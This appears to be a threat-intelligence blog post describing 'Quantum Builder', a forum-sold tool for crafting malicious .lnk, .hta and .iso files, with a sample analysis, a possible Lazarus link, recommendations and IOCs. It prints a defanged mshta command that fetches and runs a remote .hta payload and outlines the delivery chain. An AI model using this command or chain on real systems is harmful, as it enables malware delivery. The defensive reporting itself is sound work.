Cyble-Quantum-Builder

Quantum Software:  LNK file-based builders growing in popularity

Possibly associated with Lazarus APT group

Cyble Research Labs has constantly been tracking emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families using .lnk files for their payload delivery of late are:

Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.

.lnk files are shortcut files that reference other files, folders, or applications to open them. The TAs leverages the .lnk files and drops malicious payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries that are native to Operating Systems such as PowerShell and mshta. TAs can use these types of binaries to evade detection mechanisms as these binaries are trusted by Operating Systems.

During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new. lnk builder dubbed “Quantum Software/Quantum Builder.” Figure 1 shows a post made by the Threat Actor on a cybercrime forum.

Figure 1 – Post made by TA on a cybercrime forum

The TA claims that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. Figure 2 shows the pricing details and functionality of the builder.

Figure 2 – Functionality and pricing details

The TA has created a video demonstrating how to build .lnk, .hta, and .iso files using the Quantum Builder. The .hta payload can be created using Quantum Builder by customizing options such as payload URL details, DLL support, UAC Bypass, execution path and time delay to execute the payload, etc.

Figure 3 – .hta builder

The .lnk builder embeds the generated .hta payload and creates a new .lnk file. The builder provides various icons as an option while building the .lnk file. The below figure shows the Quantum .lnk builder.

Figure 4 – .lnk builder

At the end of this process, the .iso builder is used to create the .iso image containing the .lnk file for further delivery via email and execution.

Figure 5 – .iso builder

The TA has also claimed to have implemented a dogwalk n-day exploit.  This vulnerability exists in Microsoft Support Diagnostic Tool (MSDT) and could lead to code execution if the user opens a specially crafted .diagcab file, typically sent over emails by TAs. The .diagcab file further downloads a malicious file into the startup folder, which will be executed every time the user logs in.  

Figure 6 – DogWalk implementation

Technical Analysis

Further investigation revealed a post shared by the TA, indicating that this sample might be generated using Quantum Builder.

(SHA256: 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25).

The figure below shows the post made by the TA regarding the above sample.

Figure 7 – Twitter post linked by TA on a cybercrime forum

The sample mentioned in the above post connects to a domain named “quantum-software.online”; the same domain was used by quantum TA as a demo site, as mentioned in the figure below. This indicates that the identified hash is generated using the quantum builder.

Figure 8 – Demo site used by TA

This sample is a Windows Shortcut (.LNK) file. By default, Windows hides the .lnk extension, so if a file is named as file_name.txt.lnk, then only file_name.txt will be visible to the user even if the show file extension optionis enabled. For such reasons, this might be an attractive option for TAs, using the .lnk files as a disguise or smokescreen.

Figure 9 – File details

Upon execution, the .Ink file runs the malicious PowerShell code, which executes a .hta file hosted in the remote site using mshta.

This script uses a function that deobfuscates the malicious PowerShell script. The function performs a mathematical operation that converts a numeric value into characters. The figure below shows the deobfuscated data.

Figure 10 – De-obfuscated data

Command: “C:\Windows\system32\mshta.exe” hxxps[:]//quantum-software[.]online/remote/bdg[.]hta

The infection chain is represented below.

Figure 11 – Infection Chain

Possible links to Lazarus APT

In recent samples and research conducted on Lazarus APT, we observed that TAs were using .Lnk for delivering further stage payloads. Upon comparing both scripts, we found that the deobfuscation loop and initialization of variables were the same, indicating the possibility of a connection between Quantum Builder and Lazarus APT group.

Figure 12 – Similar PowerShell script

Conclusion

We have observed a steadily increasing number of high-profile TAs shifting back to .lnk files to deliver their payloads. Typically, TAs use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder.

The MSDT zero-day vulnerability, which researchers recently discovered, was also exploiting a LOLBin. Within a short window from this incident being observed in the wild, TAs have leveraged this vulnerability using different attack vectors.

The TA behind Quantum Builder appears to be updating the malicious tool with new attack techniques, making it more attractive to other TAs. We will likely see more usage of such tools in the near future.

Our Recommendations 

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:   

  • Refrain from opening untrusted links and email attachments without verifying their authenticity.  
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Verify the source of files before executing them.  
  • ​Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.   
  • ​Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.      
  • ​Conduct regular backup practices and keep those backups offline or in a separate network. 

MITRE ATT&CK® Techniques 

Tactic Technique ID Technique Name 
Initial Access T1566 Phishing 
Execution T1204 
T1059 
User Execution
Command and Scripting Interpreter 
Defense EvasionT1218
T1140
System Binary Proxy Execution
Deobfuscate/Decode Files or Information

Indicators of Compromise (IOCs)   

Indicators Indicator Type Description 
04e8a5c6e5797b0f436ca36452170a2f
924be824edb54f917d52e43a551c0eb2848cad8f 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25  
MD5
SHA-1 SHA-256  
.lnk file
hxxps[:]//quantum-software[.]online/remote/bdg[.]htaDomainMalicious Domain
52b0b06ab4cf6c6b1a13d8eec2705e3b
dfdde88da020e584038d2656d0e3d48cfae27b1a b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1
MD5
SHA-1 SHA-256  
Lazarus .lnk file
Scroll to Top